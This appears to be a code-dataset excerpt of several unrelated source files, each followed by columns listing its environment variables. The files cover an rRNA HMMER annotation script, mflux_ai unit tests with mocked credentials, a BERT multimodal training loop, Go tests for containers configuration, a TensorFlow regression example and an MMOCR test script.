header = ['##seq_name', 'method', 'feature', 'start', 'end', 'evalue', 'strand', 'frame', 'attribute']
ff = open(out_fname, "w")
dict_rRNA = {
'arc_lsu': '23S_rRNA', 'arc_ssu': '16S_rRNA', 'arc_tsu': '5S_rRNA',
'bac_lsu': '23S_rRNA', 'bac_ssu': '16S_rRNA', 'bac_tsu': '5S_rRNA',
'euk_lsu': '28S_rRNA', 'euk_ssu': '18S_rRNA', 'euk_tsu': '8S_rRNA'}
# 'arc_lsurnammer': '23S_rRNA', 'arc_ssu.rnammer': '16S_rRNA', 'arc_tsurnammer': '5S_rRNA',
# 'bac_lsurnammer': '23S_rRNA', 'bac_ssu.rnammer': '16S_rRNA', 'bac_tsurnammer': '5S_rRNA',
# 'euk_lsurnammer': '28S_rRNA', 'euk_ssu.rnammer': '18S_rRNA', 'euk_tsurnammer': '8S_rRNA'
ff.write('\t'.join(header)+'\n')
for line in hmm_resu:
# [kingdom, moltype, read, acc, tlen, qname, qaccr, \
# qlen, seq_evalue, seq_score, seq_bias, seq_num, seq_of, \
# dom_cEvalue, dom_iEvalue, dom_score, dom_bias, hmm_start, \
# hmm_end, dom_start, dom_end, env_start, env_end] = line.strip().split('\t')
[feature_type, r_start, r_end, read, evalue] = line.strip().split('\t')
if dict_read2kingdom[read.split('|')[0]][0] != feature_type.split('_')[0]:
continue
feature_type = dict_rRNA[feature_type]
if read.endswith('|rev'):
strand = '-'
tmp = map(string.atoi, [r_start, r_end])
pos = string.atoi(read[1:-4])
header = headers[pos][0]
L = headers[pos][1]
[r_end, r_start] = [str(L + 1 - x) for x in tmp]
else:
strand = '+'
pos = string.atoi(read[1:])
header = headers[pos][0]
ff.write('\t'.join([header, 'rna_hmm3', 'rRNA', r_start, r_end, evalue, strand, 'NA', feature_type]) + '\n')
ff.close()
os.remove(out_fname + '.fa')
| []
| []
| [
"HMMERDB"
]
| [] | ["HMMERDB"] | python | 1 | 0 | |
tests/test_core.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for the `mflux_ai` package."""
import os
import warnings
import responses
import mlflow
import mflux_ai
from mflux_ai.core import SERVER_HOST
@responses.activate
def test_mflux_ai_init():
"""Test the init function."""
content = {
"minio_secret_key": "minio_secret",
"minio_access_key": "minio_access",
"minio_server": "http://192.198.0.1:9000",
"mlflow_server": "http://192.198.0.1:5000",
}
responses.add(
responses.Response(
method="GET", url=SERVER_HOST + "/api/env_vars/", json=content, status=200
)
)
mflux_ai.init("thisshouldbevalidtoken")
assert os.environ.get("MLFLOW_TRACKING_URI") == content["mlflow_server"]
assert os.environ.get("MLFLOW_S3_ENDPOINT_URL") == content["minio_server"]
assert os.environ.get("AWS_SECRET_ACCESS_KEY") == content["minio_secret_key"]
assert os.environ.get("AWS_ACCESS_KEY_ID") == content["minio_access_key"]
assert os.environ.get("MLFLOW_TRACKING_TOKEN") == "thisshouldbevalidtoken"
@responses.activate
def test_mflux_ai_deprecated_set_env_vars():
"""Test the deprecated set_env_vars function."""
content = {
"minio_secret_key": "minio_secret",
"minio_access_key": "minio_access",
"minio_server": "http://192.198.0.1:9000",
"mlflow_server": "http://192.198.0.1:5000",
}
responses.add(
responses.Response(
method="GET", url=SERVER_HOST + "/api/env_vars/", json=content, status=200
)
)
with warnings.catch_warnings(record=True) as w:
# Cause all warnings to always be triggered.
warnings.simplefilter("always")
mflux_ai.set_env_vars("thisshouldbevalidtoken")
assert len(w) == 1
assert issubclass(w[-1].category, DeprecationWarning)
assert "deprecated" in str(w[-1].message)
assert os.environ.get("MLFLOW_TRACKING_URI") == content["mlflow_server"]
assert os.environ.get("MLFLOW_S3_ENDPOINT_URL") == content["minio_server"]
assert os.environ.get("AWS_SECRET_ACCESS_KEY") == content["minio_secret_key"]
assert os.environ.get("AWS_ACCESS_KEY_ID") == content["minio_access_key"]
assert os.environ.get("MLFLOW_TRACKING_TOKEN") == "thisshouldbevalidtoken"
@responses.activate
def test_get_best_run():
env_content = {
"minio_secret_key": "minio_secret",
"minio_access_key": "minio_access",
"minio_server": "http://192.198.0.1:9000",
"mlflow_server": "http://192.198.0.1:5000",
}
responses.add(
responses.Response(
method="GET",
url=SERVER_HOST + "/api/env_vars/",
json=env_content,
status=200,
)
)
mflux_ai.init("thisshouldbevalidtoken")
headers = {
"User-Agent": "mlflow-python-client/1.0.0",
"Accept-Encoding": "gzip, deflate",
"Accept": "*/*",
"Connection": "keep-alive",
"Authorization": "Bearer thisshouldbevalidtoken",
}
content = {
"run": {
"info": {
"run_uuid": "123",
"experiment_id": "2",
"user_id": "Iver",
"status": "FINISHED",
"start_time": "1577979142226",
"end_time": "1577979155221",
"artifact_uri": "s3://mlflow/2/123/artifacts",
"lifecycle_stage": "active",
"run_id": "123",
},
"data": {
"metrics": [
{
"key": "error",
"value": 1.06968755342329e-05,
"timestamp": "1577979154751",
"step": "49",
}
],
"params": [
{"key": "optimizer_name", "value": "FastGANoisyDiscreteOnePlusOne"}
],
"tags": [
{"key": "mlflow.user", "value": "Iver"},
{
"key": "mlflow.source.name",
"value": "C:/Users/Iver/Code/mflux-quickstart/nevergrad_example.py",
},
{"key": "mlflow.source.type", "value": "LOCAL"},
],
},
}
}
# Mock two different URLs to account for differences in mlflow versions
responses.add(
responses.Response(
method="GET",
url=env_content["mlflow_server"] + "/api/2.0/preview/mlflow/runs/get",
json=content,
status=200,
headers=headers,
),
)
responses.add(
responses.Response(
method="GET",
url=env_content["mlflow_server"] + "/api/2.0/mlflow/runs/get",
json=content,
status=200,
headers=headers,
),
)
headers = {
"Content-Type": "application/vnd.aiascience.mflux+json; version=0.4",
"Authorization": "api-key {}".format("thisshouldbevalidtoken"),
}
content = {"run_uuid": "123"}
url = (
SERVER_HOST
+ "/api/best_run_by_model_group/best_run/?model_group_name={}".format(
"model_name"
)
)
responses.add(
responses.Response(
method="GET", url=url, json=content, status=200, headers=headers
)
)
best_run = mflux_ai.get_best_run("model_name")
assert isinstance(best_run, mlflow.entities.run.Run)
assert best_run.info.run_uuid == content["run_uuid"]
| []
| []
| [
"AWS_SECRET_ACCESS_KEY",
"MLFLOW_S3_ENDPOINT_URL",
"MLFLOW_TRACKING_TOKEN",
"AWS_ACCESS_KEY_ID",
"MLFLOW_TRACKING_URI"
]
| [] | ["AWS_SECRET_ACCESS_KEY", "MLFLOW_S3_ENDPOINT_URL", "MLFLOW_TRACKING_TOKEN", "AWS_ACCESS_KEY_ID", "MLFLOW_TRACKING_URI"] | python | 5 | 0 | |
utils/util_train.py | from torchvision import models as modelsummary
from .util import *
import torch
from torch import nn
import numpy as np
import time
import sys
import os
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]="0,1"
activation = {}
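# Forward hook factory: saves BERT's last hidden state and pooled output into the
# activation dict under the given keys.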
def get_activation(name1, name2):
def hook(model, input, output):
activation[name1] = output.last_hidden_state.detach()
activation[name2] = output.pooler_output.detach()
return hook
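# Run one training epoch: extract image features with the feature extractor, capture BERT
# outputs via the forward hook, fuse them in the model, and log metrics every log_interval batches.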
def train(train_loader, hyp_params, model, bert, tokenizer, feature_extractor, optimizer, criterion, epoch):
epoch_loss = 0
model.train()
num_batches = hyp_params.n_train // hyp_params.batch_size
proc_loss, proc_size = 0, 0
total_loss = 0.0
losses = []
results = []
truths = []
n_examples = hyp_params.n_train
start_time = time.time()
for i_batch, data_batch in enumerate(train_loader):
input_ids = data_batch["input_ids"]
targets = data_batch["label"]
images = data_batch['image']
attention_mask = data_batch['attention_mask']
model.zero_grad()
if hyp_params.use_cuda:
with torch.cuda.device(0):
input_ids = input_ids.cuda()
attention_mask = attention_mask.cuda()
targets = targets.cuda()
images = images.cuda()
if images.size()[0] != input_ids.size()[0]:
continue
feature_images = feature_extractor.features(images)
feature_images = feature_extractor.avgpool(feature_images)
feature_images = torch.flatten(feature_images, 1)
feature_images = feature_extractor.classifier[0](feature_images)
bert.bert.register_forward_hook(get_activation('last', 'pool'))
outputs = bert(input_ids, attention_mask)
outputs = model(
last_hidden=activation['last'],
pooled_output=activation['pool'],
feature_images=feature_images
)
if hyp_params.dataset == 'memotion':
_, preds = torch.max(outputs, dim=1)
elif hyp_params.dataset == 'reddit':
_, preds = torch.max(outputs, dim=1)
else:
preds = outputs
preds_round = (preds > 0.5).float()
loss = criterion(outputs, targets)
losses.append(loss.item())
loss.backward()
nn.utils.clip_grad_norm_(model.parameters(), hyp_params.clip)
optimizer.step()
total_loss += loss.item() * hyp_params.batch_size
results.append(preds)
truths.append(targets)
proc_loss += loss * hyp_params.batch_size
proc_size += hyp_params.batch_size
if i_batch % hyp_params.log_interval == 0 and i_batch > 0:
train_acc, train_f1, train_f1_macro, train_precision, train_recall = metrics(preds_round, targets)
avg_loss = proc_loss / proc_size
elapsed_time = time.time() - start_time
msg = 'Epoch {:2d} | Batch {:3d}/{:3d} | Time/Batch(ms) {:5.2f} | Train Loss {:5.4f} | Acc {:5.4f} | micro-score {:5.4f} | macro-score {:5.4f} | precision {:5.4f} | recall {:5.4f}'.format(epoch, i_batch, num_batches, elapsed_time * 1000 / hyp_params.log_interval, avg_loss, train_acc, train_f1, train_f1_macro, train_precision, train_recall)
print(msg)
write_log(msg)
proc_loss, proc_size = 0, 0
start_time = time.time()
avg_loss = total_loss / hyp_params.n_train
results = torch.cat(results)
truths = torch.cat(truths)
return results, truths, avg_loss
def evaluate(valid_loader, hyp_params, model, bert, tokenizer, feature_extractor, criterion, train=False, train_loader=None):
model.eval()
loader = train_loader if train else valid_loader
total_loss = 0.0
results = []
truths = []
correct_predictions = 0
with torch.no_grad():
for i_batch, data_batch in enumerate(loader):
input_ids = data_batch["input_ids"]
targets = data_batch["label"]
images = data_batch['image']
attention_mask = data_batch['attention_mask']
if hyp_params.use_cuda:
with torch.cuda.device(0):
input_ids = input_ids.cuda()
attention_mask = attention_mask.cuda()
targets = targets.cuda()
images = images.cuda()
if images.size()[0] != input_ids.size()[0]:
continue
with torch.no_grad():
feature_images = feature_extractor.features(images)
feature_images = feature_extractor.avgpool(feature_images)
feature_images = torch.flatten(feature_images, 1)
feature_images = feature_extractor.classifier[0](feature_images)
bert.bert.register_forward_hook(get_activation('last', 'pool'))
outputs = bert(input_ids, attention_mask)
outputs = model(
last_hidden=activation['last'],
pooled_output=activation['pool'],
feature_images=feature_images
)
if hyp_params.dataset == 'memotion':
_, preds = torch.max(outputs, dim=1)
elif hyp_params.dataset == 'reddit':
_, preds = torch.max(outputs, dim=1)
else:
preds = outputs
total_loss += criterion(outputs, targets).item() * hyp_params.batch_size
correct_predictions += torch.sum(preds == targets)
# Collect the results into dictionary
results.append(preds)
truths.append(targets)
avg_loss = total_loss / (hyp_params.n_train if train else hyp_params.n_valid)
results = torch.cat(results)
truths = torch.cat(truths)
return results, truths, avg_loss
| []
| []
| [
"CUDA_DEVICE_ORDER",
"CUDA_VISIBLE_DEVICES"
]
| [] | ["CUDA_DEVICE_ORDER", "CUDA_VISIBLE_DEVICES"] | python | 2 | 0 | |
pkg/config/config_test.go | package config
import (
"io/ioutil"
"os"
"sort"
"github.com/containers/common/pkg/apparmor"
"github.com/containers/common/pkg/capabilities"
. "github.com/onsi/ginkgo"
"github.com/onsi/gomega"
selinux "github.com/opencontainers/selinux/go-selinux"
)
var _ = Describe("Config", func() {
BeforeEach(beforeEach)
Describe("ValidateConfig", func() {
It("should succeed with default config", func() {
// Given
// When
defaultConfig, err := NewConfig("")
// Then
gomega.Expect(err).To(gomega.BeNil())
gomega.Expect(defaultConfig.Containers.ApparmorProfile).To(gomega.Equal(apparmor.Profile))
gomega.Expect(defaultConfig.Containers.PidsLimit).To(gomega.BeEquivalentTo(2048))
})
It("should succeed with devices", func() {
// Given
sut.Containers.Devices = []string{"/dev/null:/dev/null:rw",
"/dev/sdc/",
"/dev/sdc:/dev/xvdc",
"/dev/sdc:rm",
}
// When
err := sut.Containers.Validate()
// Then
gomega.Expect(err).To(gomega.BeNil())
})
It("should fail wrong max log size", func() {
// Given
sut.Containers.LogSizeMax = 1
// When
err := sut.Validate()
// Then
gomega.Expect(err).NotTo(gomega.BeNil())
})
It("should succeed with valid shm size", func() {
// Given
sut.Containers.ShmSize = "1024"
// When
err := sut.Validate()
// Then
gomega.Expect(err).To(gomega.BeNil())
// Given
sut.Containers.ShmSize = "64m"
// When
err = sut.Validate()
// Then
gomega.Expect(err).To(gomega.BeNil())
})
It("should fail wrong shm size", func() {
// Given
sut.Containers.ShmSize = "-2"
// When
err := sut.Validate()
// Then
gomega.Expect(err).NotTo(gomega.BeNil())
})
It("Check SELinux settings", func() {
if selinux.GetEnabled() {
sut.Containers.EnableLabeling = true
gomega.Expect(sut.Containers.Validate()).To(gomega.BeNil())
gomega.Expect(selinux.GetEnabled()).To(gomega.BeTrue())
sut.Containers.EnableLabeling = false
gomega.Expect(sut.Containers.Validate()).To(gomega.BeNil())
gomega.Expect(selinux.GetEnabled()).To(gomega.BeFalse())
}
})
})
Describe("ValidateNetworkConfig", func() {
It("should succeed with default config", func() {
// Given
// When
err := sut.Network.Validate()
// Then
gomega.Expect(err).To(gomega.BeNil())
})
})
Describe("readConfigFromFile", func() {
It("should succeed with default config", func() {
// Given
// When
defaultConfig, _ := DefaultConfig()
err := readConfigFromFile("testdata/containers_default.conf", defaultConfig)
OCIRuntimeMap := map[string][]string{
"kata": {
"/usr/bin/kata-runtime",
"/usr/sbin/kata-runtime",
"/usr/local/bin/kata-runtime",
"/usr/local/sbin/kata-runtime",
"/sbin/kata-runtime",
"/bin/kata-runtime",
"/usr/bin/kata-qemu",
"/usr/bin/kata-fc",
},
"runc": {
"/usr/bin/runc",
"/usr/sbin/runc",
"/usr/local/bin/runc",
"/usr/local/sbin/runc",
"/sbin/runc",
"/bin/runc",
"/usr/lib/cri-o-runc/sbin/runc",
},
"crun": {
"/usr/bin/crun",
"/usr/local/bin/crun",
},
}
pluginDirs := []string{
"/usr/libexec/cni",
"/usr/lib/cni",
"/usr/local/lib/cni",
"/opt/cni/bin",
}
envs := []string{
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"TERM=xterm",
}
// Then
gomega.Expect(err).To(gomega.BeNil())
gomega.Expect(defaultConfig.Engine.CgroupManager).To(gomega.Equal("systemd"))
gomega.Expect(defaultConfig.Containers.Env).To(gomega.BeEquivalentTo(envs))
gomega.Expect(defaultConfig.Containers.PidsLimit).To(gomega.BeEquivalentTo(2048))
gomega.Expect(defaultConfig.Network.CNIPluginDirs).To(gomega.Equal(pluginDirs))
gomega.Expect(defaultConfig.Engine.NumLocks).To(gomega.BeEquivalentTo(2048))
gomega.Expect(defaultConfig.Engine.OCIRuntimes).To(gomega.Equal(OCIRuntimeMap))
})
It("should succeed with commented out configuration", func() {
// Given
// When
conf := Config{}
err := readConfigFromFile("testdata/containers_comment.conf", &conf)
// Then
gomega.Expect(err).To(gomega.BeNil())
})
It("should fail when file does not exist", func() {
// Given
// When
conf := Config{}
err := readConfigFromFile("/invalid/file", &conf)
// Then
gomega.Expect(err).NotTo(gomega.BeNil())
})
It("should fail when toml decode fails", func() {
// Given
// When
conf := Config{}
err := readConfigFromFile("config.go", &conf)
// Then
gomega.Expect(err).NotTo(gomega.BeNil())
})
})
Describe("NewConfig", func() {
It("should success with default config", func() {
// Given
OCIRuntimeMap := map[string][]string{
"runc": {
"/usr/bin/runc",
"/usr/sbin/runc",
"/usr/local/bin/runc",
"/usr/local/sbin/runc",
"/sbin/runc",
"/bin/runc",
"/usr/lib/cri-o-runc/sbin/runc",
"/run/current-system/sw/bin/runc",
},
"crun": {
"/usr/bin/crun",
"/usr/sbin/crun",
"/usr/local/bin/crun",
"/usr/local/sbin/crun",
"/sbin/crun",
"/bin/crun",
"/run/current-system/sw/bin/crun",
},
}
pluginDirs := []string{
"/usr/libexec/cni",
"/usr/lib/cni",
"/usr/local/lib/cni",
"/opt/cni/bin",
}
envs := []string{
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"TERM=xterm",
}
// When
config, err := NewConfig("")
// Then
gomega.Expect(err).To(gomega.BeNil())
gomega.Expect(config.Containers.ApparmorProfile).To(gomega.Equal(apparmor.Profile))
gomega.Expect(config.Containers.PidsLimit).To(gomega.BeEquivalentTo(2048))
gomega.Expect(config.Containers.Env).To(gomega.BeEquivalentTo(envs))
gomega.Expect(config.Network.CNIPluginDirs).To(gomega.Equal(pluginDirs))
gomega.Expect(config.Engine.NumLocks).To(gomega.BeEquivalentTo(2048))
gomega.Expect(config.Engine.OCIRuntimes["runc"]).To(gomega.Equal(OCIRuntimeMap["runc"]))
})
It("should success with valid user file path", func() {
// Given
// When
config, err := NewConfig("testdata/containers_default.conf")
// Then
gomega.Expect(err).To(gomega.BeNil())
gomega.Expect(config.Containers.ApparmorProfile).To(gomega.Equal("container-default"))
gomega.Expect(config.Containers.PidsLimit).To(gomega.BeEquivalentTo(2048))
})
It("contents of passed-in file should override others", func() {
// Given we do
oldContainersConf, envSet := os.LookupEnv("CONTAINERS_CONF")
os.Setenv("CONTAINERS_CONF", "containers.conf")
// When
config, err := NewConfig("testdata/containers_override.conf")
// Undo that
if envSet {
os.Setenv("CONTAINERS_CONF", oldContainersConf)
} else {
os.Unsetenv("CONTAINERS_CONF")
}
// Then
gomega.Expect(err).To(gomega.BeNil())
gomega.Expect(config).ToNot(gomega.BeNil())
gomega.Expect(config.Containers.ApparmorProfile).To(gomega.Equal("overridden-default"))
})
It("should fail with invalid value", func() {
// Given
// When
config, err := NewConfig("testdata/containers_invalid.conf")
// Then
gomega.Expect(err).ToNot(gomega.BeNil())
gomega.Expect(config).To(gomega.BeNil())
})
It("Test Capabilities call", func() {
// Given
// When
config, err := NewConfig("")
// Then
gomega.Expect(err).To(gomega.BeNil())
var addcaps, dropcaps []string
caps, err := config.Capabilities("0", addcaps, dropcaps)
gomega.Expect(err).To(gomega.BeNil())
sort.Strings(caps)
defaultCaps := config.Containers.DefaultCapabilities
sort.Strings(defaultCaps)
gomega.Expect(caps).To(gomega.BeEquivalentTo(defaultCaps))
// Add all caps
addcaps = []string{"all"}
caps, err = config.Capabilities("root", addcaps, dropcaps)
gomega.Expect(err).To(gomega.BeNil())
sort.Strings(caps)
gomega.Expect(caps).To(gomega.BeEquivalentTo(capabilities.AllCapabilities()))
// Drop all caps
dropcaps = []string{"all"}
caps, err = config.Capabilities("", addcaps, dropcaps)
gomega.Expect(err).To(gomega.BeNil())
sort.Strings(caps)
gomega.Expect(caps).ToNot(gomega.BeEquivalentTo([]string{}))
config.Containers.DefaultCapabilities = []string{
"CAP_AUDIT_WRITE",
"CAP_CHOWN",
"CAP_DAC_OVERRIDE",
"CAP_FOWNER",
}
expectedCaps := []string{
"CAP_AUDIT_WRITE",
"CAP_DAC_OVERRIDE",
"CAP_NET_ADMIN",
"CAP_SYS_ADMIN",
}
// Add all caps
addcaps = []string{"CAP_NET_ADMIN", "CAP_SYS_ADMIN"}
dropcaps = []string{"CAP_FOWNER", "CAP_CHOWN"}
caps, err = config.Capabilities("", addcaps, dropcaps)
gomega.Expect(err).To(gomega.BeNil())
sort.Strings(caps)
gomega.Expect(caps).To(gomega.BeEquivalentTo(expectedCaps))
addcaps = []string{"NET_ADMIN", "cap_sys_admin"}
dropcaps = []string{"FOWNER", "chown"}
caps, err = config.Capabilities("", addcaps, dropcaps)
gomega.Expect(err).To(gomega.BeNil())
sort.Strings(caps)
gomega.Expect(caps).To(gomega.BeEquivalentTo(expectedCaps))
expectedCaps = []string{"CAP_NET_ADMIN", "CAP_SYS_ADMIN"}
caps, err = config.Capabilities("notroot", addcaps, dropcaps)
gomega.Expect(err).To(gomega.BeNil())
sort.Strings(caps)
gomega.Expect(caps).To(gomega.BeEquivalentTo(expectedCaps))
})
It("should succeed with default pull_policy", func() {
err := sut.Engine.Validate()
gomega.Expect(err).To(gomega.BeNil())
gomega.Expect(sut.Engine.PullPolicy).To(gomega.Equal("missing"))
sut.Engine.PullPolicy = DefaultPullPolicy
err = sut.Engine.Validate()
gomega.Expect(err).To(gomega.BeNil())
})
It("should succeed case-insensitive", func() {
sut.Engine.PullPolicy = "NeVer"
err := sut.Engine.Validate()
gomega.Expect(err).To(gomega.BeNil())
})
It("should fail with invalid pull_policy", func() {
sut.Engine.PullPolicy = "invalidPullPolicy"
err := sut.Engine.Validate()
gomega.Expect(err).ToNot(gomega.BeNil())
})
})
Describe("Service Destinations", func() {
ConfPath := struct {
Value string
IsSet bool
}{}
BeforeEach(func() {
ConfPath.Value, ConfPath.IsSet = os.LookupEnv("CONTAINERS_CONF")
conf, _ := ioutil.TempFile("", "containersconf")
os.Setenv("CONTAINERS_CONF", conf.Name())
})
AfterEach(func() {
os.Remove(os.Getenv("CONTAINERS_CONF"))
if ConfPath.IsSet {
os.Setenv("CONTAINERS_CONF", ConfPath.Value)
} else {
os.Unsetenv("CONTAINERS_CONF")
}
})
It("succeed to set and read", func() {
cfg, err := ReadCustomConfig()
gomega.Expect(err).ShouldNot(gomega.HaveOccurred())
cfg.Engine.ActiveService = "QA"
cfg.Engine.ServiceDestinations = map[string]Destination{
"QA": {
URI: "https://qa/run/podman/podman.sock",
Identity: "/.ssh/id_rsa",
},
}
err = cfg.Write()
gomega.Expect(err).ShouldNot(gomega.HaveOccurred())
cfg, err = ReadCustomConfig()
gomega.Expect(err).ShouldNot(gomega.HaveOccurred())
gomega.Expect(cfg.Engine.ActiveService, "QA")
gomega.Expect(cfg.Engine.ServiceDestinations["QA"].URI,
"https://qa/run/podman/podman.sock")
gomega.Expect(cfg.Engine.ServiceDestinations["QA"].Identity,
"/.ssh/id_rsa")
})
It("succeed ActiveDestinations()", func() {
cfg, err := ReadCustomConfig()
gomega.Expect(err).ShouldNot(gomega.HaveOccurred())
cfg.Engine.ActiveService = "QA"
cfg.Engine.ServiceDestinations = map[string]Destination{
"QB": {
URI: "https://qb/run/podman/podman.sock",
Identity: "/.ssh/qb_id_rsa",
},
"QA": {
URI: "https://qa/run/podman/podman.sock",
Identity: "/.ssh/id_rsa",
},
}
err = cfg.Write()
gomega.Expect(err).ShouldNot(gomega.HaveOccurred())
cfg, err = ReadCustomConfig()
gomega.Expect(err).ShouldNot(gomega.HaveOccurred())
u, i, err := cfg.ActiveDestination()
gomega.Expect(err).ShouldNot(gomega.HaveOccurred())
gomega.Expect(u).To(gomega.Equal("https://qa/run/podman/podman.sock"))
gomega.Expect(i).To(gomega.Equal("/.ssh/id_rsa"))
})
It("succeed ActiveDestinations() CONTAINER_CONNECTION environment", func() {
cfg, err := ReadCustomConfig()
gomega.Expect(err).ShouldNot(gomega.HaveOccurred())
cfg.Engine.ActiveService = "QA"
cfg.Engine.ServiceDestinations = map[string]Destination{
"QA": {
URI: "https://qa/run/podman/podman.sock",
Identity: "/.ssh/id_rsa",
},
"QB": {
URI: "https://qb/run/podman/podman.sock",
Identity: "/.ssh/qb_id_rsa",
},
}
err = cfg.Write()
gomega.Expect(err).ShouldNot(gomega.HaveOccurred())
cfg, err = ReadCustomConfig()
gomega.Expect(err).ShouldNot(gomega.HaveOccurred())
// Given we do
oldContainerConnection, hostEnvSet := os.LookupEnv("CONTAINER_CONNECTION")
os.Setenv("CONTAINER_CONNECTION", "QB")
u, i, err := cfg.ActiveDestination()
// Undo that
if hostEnvSet {
os.Setenv("CONTAINER_CONNECTION", oldContainerConnection)
} else {
os.Unsetenv("CONTAINER_CONNECTION")
}
gomega.Expect(err).ShouldNot(gomega.HaveOccurred())
gomega.Expect(u).To(gomega.Equal("https://qb/run/podman/podman.sock"))
gomega.Expect(i).To(gomega.Equal("/.ssh/qb_id_rsa"))
})
It("succeed ActiveDestinations CONTAINER_HOST ()", func() {
cfg, err := ReadCustomConfig()
gomega.Expect(err).ShouldNot(gomega.HaveOccurred())
cfg.Engine.ActiveService = "QA"
cfg.Engine.ServiceDestinations = map[string]Destination{
"QB": {
URI: "https://qb/run/podman/podman.sock",
Identity: "/.ssh/qb_id_rsa",
},
"QA": {
URI: "https://qa/run/podman/podman.sock",
Identity: "/.ssh/id_rsa",
},
}
err = cfg.Write()
gomega.Expect(err).ShouldNot(gomega.HaveOccurred())
cfg, err = ReadCustomConfig()
gomega.Expect(err).ShouldNot(gomega.HaveOccurred())
// Given we do
oldContainerHost, hostEnvSet := os.LookupEnv("CONTAINER_HOST")
oldContainerSSH, sshEnvSet := os.LookupEnv("CONTAINER_SSHKEY")
os.Setenv("CONTAINER_HOST", "foo.bar")
os.Setenv("CONTAINER_SSHKEY", "/.ssh/newid_rsa")
u, i, err := cfg.ActiveDestination()
// Undo that
if hostEnvSet {
os.Setenv("CONTAINER_HOST", oldContainerHost)
} else {
os.Unsetenv("CONTAINER_HOST")
}
// Undo that
if sshEnvSet {
os.Setenv("CONTAINER_SSHKEY", oldContainerSSH)
} else {
os.Unsetenv("CONTAINER_SSHKEY")
}
gomega.Expect(err).ShouldNot(gomega.HaveOccurred())
gomega.Expect(u).To(gomega.Equal("foo.bar"))
gomega.Expect(i).To(gomega.Equal("/.ssh/newid_rsa"))
})
It("fail ActiveDestination() no configuration", func() {
cfg, err := ReadCustomConfig()
gomega.Expect(err).ShouldNot(gomega.HaveOccurred())
_, _, err = cfg.ActiveDestination()
gomega.Expect(err).Should(gomega.HaveOccurred())
})
})
Describe("Reload", func() {
It("test new config from reload", func() {
// Default configuration
defaultTestFile := "testdata/containers_default.conf"
oldEnv, set := os.LookupEnv("CONTAINERS_CONF")
os.Setenv("CONTAINERS_CONF", defaultTestFile)
cfg, err := Default()
gomega.Expect(err).To(gomega.BeNil())
if set {
os.Setenv("CONTAINERS_CONF", oldEnv)
} else {
os.Unsetenv("CONTAINERS_CONF")
}
// Reload from new configuration file
testFile := "testdata/temp.conf"
content := `[containers]
env=["foo=bar"]`
err = ioutil.WriteFile(testFile, []byte(content), os.ModePerm)
defer os.Remove(testFile)
gomega.Expect(err).To(gomega.BeNil())
oldEnv, set = os.LookupEnv("CONTAINERS_CONF")
os.Setenv("CONTAINERS_CONF", testFile)
_, err = Reload()
gomega.Expect(err).To(gomega.BeNil())
newCfg, err := Default()
gomega.Expect(err).To(gomega.BeNil())
if set {
os.Setenv("CONTAINERS_CONF", oldEnv)
} else {
os.Unsetenv("CONTAINERS_CONF")
}
expectOldEnv := []string{"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "TERM=xterm"}
expectNewEnv := []string{"foo=bar"}
gomega.Expect(cfg.Containers.Env).To(gomega.Equal(expectOldEnv))
gomega.Expect(newCfg.Containers.Env).To(gomega.Equal(expectNewEnv))
// Reload change back to default global configuration
_, err = Reload()
gomega.Expect(err).To(gomega.BeNil())
})
})
})
| [
"\"CONTAINERS_CONF\""
]
| []
| [
"CONTAINERS_CONF"
]
| [] | ["CONTAINERS_CONF"] | go | 1 | 0 | |
testpy3/tensorflow1.py | import os
import numpy as np
import tensorflow as tf
# Ignore warn: Your CPU supports instructions that this TensorFlow binary
# was not compiled
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
##构造数据##
x_data = np.random.rand(100).astype(np.float32) # 随机生成100个类型为float32的值
y_data = x_data * 0.1 + 0.3 # 定义方程式y=x_data*A+B
##建立TensorFlow神经计算结构##
weight = tf.Variable(tf.random_uniform([1], -1.0, 1.0))
biases = tf.Variable(tf.zeros([1]))
y = weight * x_data + biases
loss = tf.reduce_mean(tf.square(y - y_data)) # 判断与正确值的差距
optimizer = tf.train.GradientDescentOptimizer(0.5) # 根据差距进行反向传播修正参数
train = optimizer.minimize(loss) # 建立训练器
# init=tf.initialize_all_variables() #初始化TensorFlow训练结构
init = tf.global_variables_initializer() # 初始化TensorFlow训练结构
sess = tf.Session() # 建立TensorFlow训练会话
sess.run(init) # 将训练结构装载到会话中
for step in range(400): # 循环训练400次
sess.run(train) # 使用训练器根据训练结构进行训练
if step % 20 == 0: # 每20次打印一次训练结果
print(step, sess.run(weight), sess.run(biases)) # 训练次数,A值,B值
| []
| []
| [
"TF_CPP_MIN_LOG_LEVEL"
]
| [] | ["TF_CPP_MIN_LOG_LEVEL"] | python | 1 | 0 | |
tools/kie_test_imgs.py | #!/usr/bin/env python
import argparse
import os
import os.path as osp
import json
import mmcv
import torch
import numpy as np
from mmcv import Config
from mmcv.image import tensor2imgs
from mmcv.parallel import MMDataParallel
from mmcv.runner import load_checkpoint
from mmocr.models.textdet.detectors.text_detector_mixin import TextDetectorMixin as tdm
from mmocr.datasets import build_dataloader, build_dataset
from mmocr.models import build_detector
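# Run inference over the whole data loader and optionally show or save the predictions
# drawn alongside the ground-truth boxes.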
def test(model, data_loader, show=False, out_dir=None):
model.eval()
results = []
dataset = data_loader.dataset
prog_bar = mmcv.ProgressBar(len(dataset))
for i, data in enumerate(data_loader):
with torch.no_grad():
result = model(return_loss=False, rescale=True, **data)
batch_size = len(result)
if show or out_dir:
img_tensor = data['img'].data[0]
img_metas = data['img_metas'].data[0]
imgs = tensor2imgs(img_tensor, **img_metas[0]['img_norm_cfg'])
assert len(imgs) == len(img_metas)
gt_bboxes = [data['gt_bboxes'].data[0][0].numpy().tolist()]
for i, (img, img_meta) in enumerate(zip(imgs, img_metas)):
h, w, _ = img_meta['img_shape']
img_show = img[:h, :w, :]
if out_dir:
out_file = osp.join(out_dir, img_meta['ori_filename'])
else:
out_file = None
model.module.show_result(
img_show,
result[i],
gt_bboxes[i],
show=show,
out_file=out_file)
for _ in range(batch_size):
prog_bar.update()
#final_result=tdm.get_boundary(result)
#print(final_result)
return result
def parse_args():
parser = argparse.ArgumentParser(
description='MMOCR visualize for kie model.')
parser.add_argument('config', help='Test config file path.')
parser.add_argument('checkpoint', help='Checkpoint file.')
